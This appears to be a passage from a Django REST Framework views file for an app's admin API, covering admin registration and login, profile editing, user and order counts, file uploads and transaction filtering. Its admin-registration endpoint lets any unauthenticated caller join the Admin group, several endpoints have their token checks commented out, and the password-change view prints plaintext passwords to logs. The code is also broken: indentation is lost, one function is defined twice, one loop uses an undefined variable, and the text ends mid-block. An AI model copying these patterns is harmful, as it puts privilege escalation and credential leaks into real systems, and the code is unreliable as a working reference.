authuser = User.objects.create(email = received_json_data['email'],
phone = received_json_data['phone'],
username = received_json_data['email'],
password = make_password(received_json_data['password']),
deviceId = received_json_data['deviceId'],
deviceType = received_json_data['deviceType'])
g = Group.objects.get(name='Admin')
g.user_set.add(authuser)
token = Token.objects.create(user=authuser)
return Response({"message" : addSuccessMessage,"token":token.key ,"status" : "1"}, status=status.HTTP_201_CREATED)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#===========================================
# adding promo post by admin
#===========================================
@api_view(['POST'])
def addadminPost(request):
try:
with transaction.atomic():
received_json_data = json.loads(request.data['data'], strict=False)
try:
API_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='Admin').exists()
if checkGroup == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
user1 = User.objects.get(id = user.id)
nowTime = datetime.datetime.utcnow().replace(tzinfo=utc)
post = Post.objects.create(
post_description = received_json_data['post_description'],
user_id = user1.id,
created_time = nowTime,
post_status = 1)
if post is not None:
post_count = user1.post_count
User.objects.filter(id = user.id).update(post_count = post_count+1)
file = request.FILES.get('post_image')
fs = FileSystemStorage()
filename = fs.save("postimages/"+str(post.id)+"/"+file.name, file)
uploaded_file_url = fs.url(filename)
PostImage.objects.create(post_images = uploaded_file_url,post_id = post.id)
return Response({"message" : addPostSuccessMessage, "status" : "1"}, status=status.HTTP_200_OK)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#=========================================
# Registered Users
#=========================================
@api_view(['POST'])
def RegisteredUsers(request):
try:
with transaction.atomic():
try:
API_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='Admin').exists()
if checkGroup == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
registered = User.objects.all()
if registered:
registered_serializer = UserSerializer(registered, many=True)
data = registered_serializer.data
return Response({"message" : "list of users","data":data}, status=status.HTTP_201_CREATED)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#=========================================
# Total Users
#=========================================
@api_view(['GET'])
def RegisteredUsers(request):
# try:
# with transaction.atomic():
# try:
# API_key = request.META.get('HTTP_AUTHORIZATION')
# token1 = Token.objects.get(key=API_key)
# user = token1.user
# checkGroup = user.groups.filter(name='Admin').exists()
# if checkGroup == False:
# return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
# except:
# return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
registered = User.objects.all().count()
# if registered:
# registered_serializer = UserSerializer(registered, many=True)
# data = registered_serializer.data
return Response({"message" : "list of users","data":registered}, status=status.HTTP_201_CREATED)
# except Exception:
# print(traceback.format_exc())
# return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#=====================================
#Active Users
#=====================================
@api_view(['GET'])
def ActiveUsers(request):
# try:
# with transaction.atomic():
# try:
# API_key = request.META.get('HTTP_AUTHORIZATION')
# token1 = Token.objects.get(key=API_key)
# user = token1.user
# checkGroup = user.groups.filter(name='Admin').exists()
# if checkGroup == False:
# return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
# except:
# return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
nowTime = datetime.datetime.now()
now_minus_10 = nowTime - datetime.timedelta(minutes = 10)
# count = User.objects.filter(lastUpdated__startswith=timezone.now().date()).count()
# count = User.objects.filter(lastUpdated__startswith=now_minus_10).count()
count = User.objects.filter(lastUpdated__gte=now_minus_10).count()
return Response({"message" : "list of users","data":count}, status=status.HTTP_201_CREATED)
# except Exception:
# print(traceback.format_exc())
# return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#==========================================
#Total Orders
#==========================================
@api_view(['GET'])
def TotalOrders(request):
registered = OrderTrn.objects.all().count()
return Response({"message" : "total orders","data":registered}, status=status.HTTP_201_CREATED)
#===========================================
# promo post
#===========================================
#===========================================
# payment
#===========================================
# filter payment by username and date
#===========================================
# notifications
#===========================================
# help support
# like and comments on post
# report post
# list posts
import pdb
#########################################################################################################################
#########################################################################################################################
#****************************************************Admin Apis**********************************************************
#########################################################################################################################
#########################################################################################################################
############################################################
# Admin login
############################################################
############################################################
# Admin Register
############################################################
@csrf_exempt
@api_view(['POST'])
def AdminRegister(request):
try:
with transaction.atomic():
deviceId = request.data['device_id']
email = request.data['email']
if request.POST.get('deviceType') is not None:
deviceType = request.data['deviceType']
else:
deviceType = "a"
if email is None or email == "Null" or email == "null":
email = deviceId+"@Distaff.com"
username = email
nowTime = datetime.datetime.now()
try:
existedUser = User.objects.get(device_id =deviceId)
except:
existedUser = None
if existedUser is not None:
return Response({"status" : "1", 'message':'User Already Registered'}, status=status.HTTP_200_OK)
else:
authUser = User.objects.create(username=email,
email=email,
first_name='firstname',
last_name='',
password=make_password(request.data['password']),
deviceType=deviceType,
deviceId=deviceId,
date_joined= nowTime,
is_superuser=0,
is_staff=0,
is_active=1,
role=2 )
serialized_data = UserSerializer(authUser)
g = Group.objects.get(name='Admin')
g.user_set.add(authUser)
token = Token.objects.create(user=authUser)
userDetail = {'token':token.key, 'user': serialized_data.data}
return Response({"status" : "1", 'message':'User has been successfully registered.', 'user' : userDetail}, status=status.HTTP_200_OK)
except Exception as e:
print(traceback.format_exc())
return Response({'status':0, 'message':"Something Wrong."}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#############################################################
# Admin Login
############################################################
@csrf_exempt
@api_view(['POST'])
def AdminLogin(request):
try:
with transaction.atomic():
deviceId = request.data['device_id']
email = request.data['email']
password = request.data['password']
if request.POST.get('deviceType') is not None:
deviceType = request.data['deviceType']
else:
deviceType = "a"
if email is None or email == "Null" or email == "null":
email = deviceId+"@Distaff.com"
username = email
nowTime = datetime.datetime.now()
is_email_error = False
try:
existedUser = User.objects.get(email =email)
except:
existedUser = None
is_email_error = True
if existedUser is not None:
authUser = authenticate(username=email, password=password)
if authUser is not None:
checkGroup = authUser.groups.filter(name='Admin').exists()
if checkGroup:
token = ''
try:
user_with_token = Token.objects.get(user=authUser)
except:
user_with_token = None
if user_with_token is None:
token1 = Token.objects.create(user=authUser)
token = token1.key
else:
Token.objects.get(user=authUser).delete()
token1 = Token.objects.create(user=authUser)
token = token1.key
serialized_data = UserSerializer(existedUser)
userDetail = {'token':token, 'user': serialized_data.data }
User.objects.filter(id=existedUser.id).update(lastUpdated = nowTime)
return Response({"status" : "1", 'message':'User Login Sucessfully', 'data':userDetail, 'is_email_error':is_email_error}, status=status.HTTP_200_OK)
else:
return Response({"status" : "1", 'message':'Email Or Password is Wrong.','is_email_error':is_email_error}, status=status.HTTP_400_BAD_REQUEST)
else:
return Response({"status" : "1", 'message':'Please Register Your Account.','is_email_error':is_email_error}, status=status.HTTP_400_BAD_REQUEST)
except Exception as e:
print(traceback.format_exc())
return Response({'status':0, 'message':"Something Wrong."}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
############################################################
# Get Admin profile
############################################################
@api_view(['GET'])
def Get_Admin_Profile(request):
try:
with transaction.atomic():
API_key = request.META.get('HTTP_AUTHORIZATION')
if API_key is not None:
try:
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='Admin').exists()
except:
return Response({"message": "Session expired!! please login again", "status": "0"},
status=status.HTTP_401_UNAUTHORIZED)
if checkGroup:
user = User.objects.filter(id=user.id)
if user is not None:
user_serializer = UserSerializer(user, many = True)
return Response({"message" : addSuccessMessage, "response" : user_serializer.data, "status" : "1"}, status=status.HTTP_200_OK)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
else:
return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_401_UNAUTHORIZED)
except Exception as e:
print(traceback.format_exc())
return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
###############################################################
# Edit Admin Profile
###############################################################
@api_view(['POST'])
def EditProfile(request):
try:
with transaction.atomic():
try:
api_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=api_key)
user = token1.user
check_group = user.groups.filter(name='Admin').exists()
if check_group == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
print(traceback.format_exc())
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
user.first_name = request.data.get('first_name')
user.last_name = request.data.get('last_name')
user.email = request.data.get('email')
user.username = request.data.get('email')
user.save(update_fields=['first_name', 'last_name', 'email', 'username'])
return Response({"Message": "User Updated Successfully.", "user": user.id,"status" : "1"}, status=status.HTTP_200_OK)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
############################################################
# Get Dashboard Data
############################################################
@api_view(['GET'])
def Dashboard(request):
try:
with transaction.atomic():
try:
api_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=api_key)
user = token1.user
check_group = user.groups.filter(name='Admin').exists()
if check_group == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
print(traceback.format_exc())
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
registered_user = User.objects.filter(is_staff=0,role=0).count()
nowTime = datetime.datetime.now()
now_minus_10 = nowTime - datetime.timedelta(minutes = 10)
active_user = User.objects.filter(lastUpdated__gte=now_minus_10,is_staff=0,role=0).count()
total_order = OrderTrn.objects.all().count()
return Response({"total_users" : registered_user, "total_active_users" : active_user,"total_order": total_order,"status" : "1"}, status=status.HTTP_200_OK)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
########################################################################################
# logout Admin User
########################################################################################
@api_view(['POST'])
def LogutAdminUser(request):
try:
with transaction.atomic():
API_Key = request.META.get('HTTP_AUTHORIZATION')
if API_Key is not None:
try:
token1 = Token.objects.get(key=API_Key)
user = token1.user
except:
token1 = None
user = None
if user is not None:
user.auth_token.delete()
return Response({"message": "Logged Out Successfully","status":"1"}, status=status.HTTP_200_OK)
else:
return Response({"message" : errorMessage,"status":"0"},status = status.HTTP_401_UNAUTHORIZED)
else:
return Response({"message": errorMessage, "status":"0"},status = status.HTTP_401_UNAUTHORIZED)
except Exception:
print(traceback.format_exc())
return Response({"message": errorMessage,"status":"0"},status=status.HTTP_500_INTERNAL_SERVER_ERROR)
##################################################################################################################
# Change Admin Password
##################################################################################################################
@api_view(['POST'])
def Change_Admin_Password(request):
try:
with transaction.atomic():
API_Key = request.META.get('HTTP_AUTHORIZATION')
if API_Key is not None:
try:
print("jj")
token1 = Token.objects.get(key=API_Key)
print(token1,"token")
user = token1.user
print(user,"user")
checkGroup = user.groups.filter(name='Admin').exists()
print(checkGroup,"checkGroup")
except:
return Response({"message": "Session expired! please login again", "status":"0"},status=status.HTTP_401_UNAUTHORIZED)
if checkGroup:
print("djhdgvhdghvdghd")
user1 = User.objects.get(id=user.id)
print(user1)
currentPassword = request.data['currentPassword']
print(currentPassword,"currentPassword")
newPassword = request.data['newPassword']
print(newPassword,"newPassword")
confirmPassword = request.data['confirmPassword']
print(confirmPassword,"confirmPassword")
success = user.check_password(str(currentPassword))
print(success,"kkjghgfg")
if success:
if currentPassword == newPassword:
return Response({"message": "Please Enter a Different new Password", "status":"0"},status=status.HTTP_406_NOT_ACCEPTABLE)
else:
u = User.objects.get(id=user.id)
print(u,"user")
if newPassword == confirmPassword:
u.set_password(newPassword)
result = User.objects.filter(id=user.id).update(password = make_password(newPassword))
print(result,"resuullttt")
if result:
return Response({"status":"1","message": "Password Changed Successfully"},status=status.HTTP_200_OK)
else:
return Response({"message": errorMessage,"status":"0"},status=status.HTTP_500_INTERNAL_SERVER_ERROR)
else:
return Response({"message": "newPassword and ConfirmPassword not Matched","status":"0"},status=status.HTTP_406_NOT_ACCEPTABLE)
else:
return Response({"message": "current password incorrect","status":"0"},status=status.HTTP_406_NOT_ACCEPTABLE)
else:
return Response({"message": "Session expired! please login again", "status":"0"},status=status.HTTP_401_UNAUTHORIZED)
except Exception:
print(traceback.format_exc())
return Response({"message": errorMessage,"status":"0"},status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#############################################################################################
# upload file
#############################################################################################
@api_view(['POST'])
def uploadfile(request):
try:
with transaction.atomic():
try:
print(request.data.get('id'),"iiii")
api_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=api_key)
user = token1.user
check_group = user.groups.filter(name='Admin').exists()
if check_group == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
print(traceback.format_exc())
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
try:
if request.data.get('type') == "notifications":
is_array = isinstance(request.data.get('id').split(','), list)
print(is_array,"array")
request_id = request.data.get('id').split(',')
print(request_id,"idddddd")
else:
request_id = int(request.data.get('id'))
except:
request_id = None
print(request_id)
if request_id is not None:
if request.data.get('type') == "post":
file = request.FILES.get('file')
fs = FileSystemStorage()
filename = fs.save("postimages/"+str(request_id)+"/"+file.name, file)
uploaded_file_url = fs.url(filename)
PostImage.objects.create(post_images = uploaded_file_url,post_id =request_id)
if request.data.get('type') == "userprofile":
file = request.FILES.get('file')
fs = FileSystemStorage()
filename = fs.save("userimage/"+str(request_id)+"/"+file.name, file)
uploaded_file_url = fs.url(filename)
User.objects.filter(id = request_id).update(image = uploaded_file_url)
return Response({"message" : "Response Send Succesfully","status" : "1"}, status=status.HTTP_200_OK)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
####################################################################################
# list of active users
####################################################################################
@api_view(['GET'])
def Active_Users(request):
try:
with transaction.atomic():
try:
API_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='Admin').exists()
if checkGroup == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
nowTime = datetime.datetime.now()
now_minus_10 = nowTime - datetime.timedelta(minutes = 10)
activity = User.objects.filter(lastUpdated__gte=now_minus_10,is_staff=0,role=0)
count = User.objects.filter(lastUpdated__gte=now_minus_10).count()
userserializer = UserSerializer(activity,many=True)
user_serial = userserializer.data
for i in user_serial:
i1['user_name'] = i1['user_name'][:30]
i1['email'] = i1['email'][:30]
return Response({"message" : "Response Send Succesfully","status" : "1","response":user_serial}, status=status.HTTP_200_OK)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
################################################################################################
# list of registered users
################################################################################################
@api_view(['GET'])
def Registered_Users(request):
try:
with transaction.atomic():
try:
API_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='Admin').exists()
if checkGroup == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
# userss = User.objects.all()
# users = Group.objects.filter(user__in=userss,name='User')
# user_list = User.objects.filter(id__in=users)
# if user_list is not None:
# userserializer = UserSerializer(user_list,many=True)
users = User.objects.filter(is_staff=0,role=0)
totaluser = User.objects.all().count() # total users
print("i", users)
print("p", totaluser)
for i in users:
checkGroup = i.groups.filter(name='User').exists()
print("00", checkGroup)
if checkGroup:
userserializer = UserSerializer(users,many=True)
user_serial = userserializer.data
for i1 in user_serial:
i1['user_name'] = i1['user_name'][:30]
i1['email'] = i1['email'][:30]
return Response({"message" : "Response Send Succesfully","status" : "1","response":user_serial}, status=status.HTTP_200_OK)
else:
print("admin")
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
############################################################
# Show Profile
############################################################
@api_view(['POST'])
def Show_Profile(request):
try:
with transaction.atomic():
try:
api_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=api_key)
user = token1.user
userId = request.data.get('userId')
check_group = user.groups.filter(name='Admin').exists()
if check_group == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
print(traceback.format_exc())
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
print(userId)
try:
userr = User.objects.get(id=userId)
except:
userr=None
if userr is not None:
user_detail = UserSerializer(userr)
userserializer = user_detail.data
userserializer['user_name'] = userserializer['user_name'][:30]
userserializer['fullname'] = userserializer['fullname'][:30]
userserializer['email'] = userserializer['email'][:30]
userserializer['about_me'] = userserializer['about_me'][:30]
####################post of the user
post_count = Post.objects.filter(user_id=userId).count()
post_user = Post.objects.filter(user_id=userId).order_by('-created_time')
post_user_serializer = PostSerializer(post_user,many=True)
poost = post_user_serializer.data
###################post images
for i in poost:
i['post_description'] = i['post_description'][:30]
pst_image = PostImage.objects.filter(post_id=i['id']).values("post_images")
for i1 in pst_image:
i['image'] = i1['post_images']
return Response({"message" : addSuccessMessage, "status" : "1", "userr": userserializer,"user_post":post_user_serializer.data,"total_post":post_count}, status=status.HTTP_201_CREATED)
else:
return Response({"message" : "User Not Found", "status" : "1"}, status=status.HTTP_201_CREATED)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
############################################################
# Show Post
############################################################
@api_view(['POST'])
def Show_Post(request):
try:
with transaction.atomic():
try:
api_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=api_key)
user = token1.user
postId = request.data.get('postId')
check_group = user.groups.filter(name='Admin').exists()
if check_group == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
print(traceback.format_exc())
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
try:
pst = Post.objects.get(id=postId)
except:
pst=None
if pst is not None:
post_detail = PostSerializer(pst)
pstserializer = post_detail.data
print(pstserializer)
###################post images
pst_image = PostImage.objects.filter(post_id=pstserializer['id']).values("post_images")
for i1 in pst_image:
pstserializer['image'] = i1['post_images']
return Response({"message" : addSuccessMessage, "status" : "1", "reported_post": pstserializer}, status=status.HTTP_201_CREATED)
else:
return Response({"message" : "User Not Found", "status" : "1"}, status=status.HTTP_201_CREATED)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
######################################################################################
# get_trans_detail
######################################################################################
@api_view(['GET'])
def Trans_Detail(request):
try:
with transaction.atomic():
try:
API_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='Admin').exists()
if checkGroup == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
############### Search Start ################
try:
search = request.GET.get('search')
# except:
# search = None
if search is not None:
print("if chla")
data = json.loads(request.GET.get('data'), strict=False)
print(data)
#########################all filter##############################
# if ((data['user_name']!='') and (data['start_date']!='') and (data['end_date']!='')):
# print("all filter")
# orders = OrderTrn.objects.all().count()
# # start_date = datetime.datetime.strptime(data['start_date'], "%d/%m/%Y").strftime("%Y-%m-%d")
# # print(stat_date)
# user_id = User.objects.get(user_name=data['user_name'])
# trans = OrderTrn.objects.filter(user_id=user_id.id,transaction_time__lte=data['start_date'],transaction_time__gt=data['end_date']).order_by('-transaction_time')
# if trans:
# transerializer = OrderTrnSerializer(trans,many=True)
# trans = transerializer.data
# for ii in trans:
# ii['transaction_time'] = ii['transaction_time'][:10]
# ii['refund_time'] = ii['refund_time'][:10]
# for index,data in enumerate(trans):
# trans_user = User.objects.filter(id=data['user'])
# if trans_user:
# trans_user_serializer = UserSerializer(trans_user,many=True)
# trans[index]['user'] = trans_user_serializer.data[0]
# return Response({"message" : "Response Send Succesfully","status" : "1","response":trans,'count':transerializer.data.__len__()}, status=status.HTTP_200_OK)
# else:
# return Response({"message" : "Response Send Succesfully","status" : "1","response":[]}, status=status.HTTP_200_OK)
# elif ((data['user_name']!='') and (data['start_date']!=None) and (data['end_date']!=None)):
# print("all filter")
# orders = OrderTrn.objects.all().count()
# # start_date = datetime.datetime.strptime(data['start_date'], "%d/%m/%Y").strftime("%Y-%m-%d")
# # print(stat_date)
# user_id = User.objects.get(user_name=data['user_name'])
# trans = OrderTrn.objects.filter(user_id=user_id.id,transaction_time__lte=data['start_date'],transaction_time__gt=data['end_date']).order_by('-transaction_time')
# if trans:
# transerializer = OrderTrnSerializer(trans,many=True)
# trans = transerializer.data
# for ii in trans:
# ii['transaction_time'] = ii['transaction_time'][:10]
# ii['refund_time'] = ii['refund_time'][:10]
# for index,data in enumerate(trans):
# trans_user = User.objects.filter(id=data['user'])
# if trans_user:
# trans_user_serializer = UserSerializer(trans_user,many=True)
# trans[index]['user'] = trans_user_serializer.data[0]
# return Response({"message" : "Response Send Succesfully","status" : "1","response":trans,'count':transerializer.data.__len__()}, status=status.HTTP_200_OK)
# else:
# return Response({"message" : "Response Send Succesfully","status" : "1","response":[]}, status=status.HTTP_200_OK)
###########################empty filter##########################################
if ((data['user_name']=='') and (data['start_date']=='') and (data['end_date']=='')):
print("empty filter")
orders = OrderTrn.objects.all().count()
trans = OrderTrn.objects.all().order_by('-transaction_time')
print(trans)
if trans:
transerializer = OrderTrnSerializer(trans,many=True)
trans = transerializer.data
for ii in trans:
ii['transaction_time'] = ii['transaction_time'][:10]
ii['refund_time'] = ii['refund_time'][:10]
ii['service_tax'] = round(float(ii['total_amount']) *(.06),2)
for index,data in enumerate(trans):
trans_user = User.objects.filter(id=data['user'])
if trans_user:
trans_user_serializer = UserSerializer(trans_user,many=True)
trans[index]['user'] = trans_user_serializer.data[0]
return Response({"message" : "Response Send Succesfully","status" : "1","response":trans,'count':transerializer.data.__len__()}, status=status.HTTP_200_OK)
else:
return Response({"message" : "Response Send Succesfully","status" : "1","response":[],}, status=status.HTTP_200_OK)
elif ((data['user_name']=='') and (data['start_date']==None) and (data['end_date']==None)):
print("empty filter")
orders = OrderTrn.objects.all().count()
trans = OrderTrn.objects.all().order_by('-transaction_time')
print(trans)
if trans:
transerializer = OrderTrnSerializer(trans,many=True)
trans = transerializer.data
for ii in trans:
ii['transaction_time'] = ii['transaction_time'][:10]
ii['refund_time'] = ii['refund_time'][:10]
ii['service_tax'] = round(float(ii['total_amount']) *(.06),2)
for index,data in enumerate(trans):
trans_user = User.objects.filter(id=data['user'])
if trans_user:
trans_user_serializer = UserSerializer(trans_user,many=True)
trans[index]['user'] = trans_user_serializer.data[0]
return Response({"message" : "Response Send Succesfully","status" : "1","response":trans,'count':transerializer.data.__len__()}, status=status.HTTP_200_OK)
else:
return Response({"message" : "Response Send Succesfully","status" : "1","response":[],}, status=status.HTTP_200_OK)
##################################user filter########################################
elif ((data['user_name']!='') and (data['start_date']=='') and (data['end_date']=='')):
print("user filter")
orders = OrderTrn.objects.all().count()
user_id = User.objects.get(user_name=data['user_name'])
if user_id:
trans = OrderTrn.objects.filter(user_id=user_id.id).order_by('-transaction_time')
print(trans)
if trans:
transerializer = OrderTrnSerializer(trans,many=True)
trans = transerializer.data
for ii in trans:
ii['transaction_time'] = ii['transaction_time'][:10]
ii['refund_time'] = ii['refund_time'][:10]
ii['service_tax'] = round(float(ii['total_amount']) *(.06),2)
for index,data in enumerate(trans):
trans_user = User.objects.filter(id=data['user'])
if trans_user:
trans_user_serializer = UserSerializer(trans_user,many=True)
trans[index]['user'] = trans_user_serializer.data[0]
return Response({"message" : "Response Send Succesfully","status" : "1","response":trans,'count':transerializer.data.__len__()}, status=status.HTTP_200_OK)
else:
return Response({"message" : "Response Send Succesfully","status" : "1","response":[],}, status=status.HTTP_200_OK)
else:
return Response({"message" : "Response Send Succesfully","status" : "1","response":[],}, status=status.HTTP_200_OK)
elif ((data['user_name']!='') and (data['start_date']==None) and (data['end_date']==None)):
print("user filter")
try:
orders = OrderTrn.objects.all().count()
user_id = User.objects.get(user_name=data['user_name'])
print(user_id,"llll")
trans = OrderTrn.objects.filter(user_id=user_id.id).order_by('-transaction_time')
print(trans)
if trans:
transerializer = OrderTrnSerializer(trans,many=True)
trans = transerializer.data
for ii in trans:
ii['transaction_time'] = ii['transaction_time'][:10]
ii['refund_time'] = ii['refund_time'][:10]
ii['service_tax'] = round(float(ii['total_amount']) *(.06),2)
for index,data in enumerate(trans):
trans_user = User.objects.filter(id=data['user'])
if trans_user:
trans_user_serializer = UserSerializer(trans_user,many=True)
trans[index]['user'] = trans_user_serializer.data[0]
return Response({"message" : "Response Send Succesfully","status" : "1","response":trans,'count':transerializer.data.__len__()}, status=status.HTTP_200_OK)
else:
return Response({"message" : "Response Send Succesfully","status" : "1","response":[],}, status=status.HTTP_200_OK)
except:
return Response({"message" : "Response Send Succesfully","status" : "1","response":[],}, status=status.HTTP_200_OK)
####################################date filter###########################################
elif ((data['user_name']=='') and (data['start_date']!='') and (data['end_date']!='')):
print("date filter")
orders = OrderTrn.objects.all().count()
trans_sum = OrderTrn.objects.filter(transaction_time__gt=data['start_date'],transaction_time__lte=data['end_date']).aggregate(Sum('total_amount'))
print(trans_sum)
trans = OrderTrn.objects.filter(transaction_time__gte=data['start_date'],transaction_time__lte=data['end_date']).order_by('-transaction_time')
print(trans)
if trans:
transerializer = OrderTrnSerializer(trans,many=True)
trans = transerializer.data
for ii in trans:
ii['transaction_time'] = ii['transaction_time'][:10]
ii['refund_time'] = ii['refund_time'][:10]
ii['service_tax'] = round(float(ii['total_amount']) *(.06),2)
for index,data in enumerate(trans):
trans_user = User.objects.filter(id=data['user'])
if trans_user:
trans_user_serializer = UserSerializer(trans_user,many=True)
trans[index]['user'] = trans_user_serializer.data[0]
return Response({"message" : "Response Send Succesfully","status" : "1","response":trans,'count':transerializer.data.__len__()}, status=status.HTTP_200_OK)
else:
return Response({"message" : "Response Send Succesfully","status" : "1","response":[],}, status=status.HTTP_200_OK)
elif ((data['user_name']=='') and (data['start_date']!=None) and (data['end_date']!=None)):
print("date filter")
orders = OrderTrn.objects.all().count()
trans_sum = OrderTrn.objects.filter(transaction_time__gt=data['start_date'],transaction_time__lte=data['end_date']).aggregate(Sum('total_amount'))
print(trans_sum)
trans = OrderTrn.objects.filter(transaction_time__gte=data['start_date'],transaction_time__lte=data['end_date']).order_by('-transaction_time')
print(trans)
if trans:
transerializer = OrderTrnSerializer(trans,many=True)
trans = transerializer.data
for ii in trans:
ii['transaction_time'] = ii['transaction_time'][:10]
ii['refund_time'] = ii['refund_time'][:10]
ii['service_tax'] = round(float(ii['total_amount']) *(.06),2)
for index,data in enumerate(trans):
trans_user = User.objects.filter(id=data['user'])
if trans_user:
trans_user_serializer = UserSerializer(trans_user,many=True)
trans[index]['user'] = trans_user_serializer.data[0]
return Response({"message" : "Response Send Succesfully","status" : "1","response":trans,'count':transerializer.data.__len__()}, status=status.HTTP_200_OK)
else:
return Response({"message" : "Response Send Succesfully","status" : "1","response":[],}, status=status.HTTP_200_OK)
####################################no filter#######################################
else:
data = json.loads(request.GET.get('data'), strict=False)
if ((data['user_name']=='') and (data['start_date']!='') and (data['end_date']!='')):
print("no filter")
orders = OrderTrn.objects.all().count()
trans = OrderTrn.objects.all().order_by('-transaction_time')
if trans:
transerializer = OrderTrnSerializer(trans,many=True)
trans = transerializer.data
for ii in trans:
ii['transaction_time'] = ii['transaction_time'][:10]
ii['refund_time'] = ii['refund_time'][:10]
ii['service_tax'] = round(float(ii['total_amount']) *(.06),2)
for index,data in enumerate(trans):
trans_user = User.objects.filter(id=data['user'])
if trans_user:
trans_user_serializer = UserSerializer(trans_user,many=True)
trans[index]['user'] = trans_user_serializer.data[0]
return Response({"message" : "Response Send Succesfully","status" : "1","response":trans,'count':transerializer.data.__len__()}, status=status.HTTP_200_OK)
else:
return Response({"message" : "Response Send Succesfully","status" : "1","response":[],}, status=status.HTTP_200_OK)
except:
data = json.loads(request.GET.get('data'), strict=False)
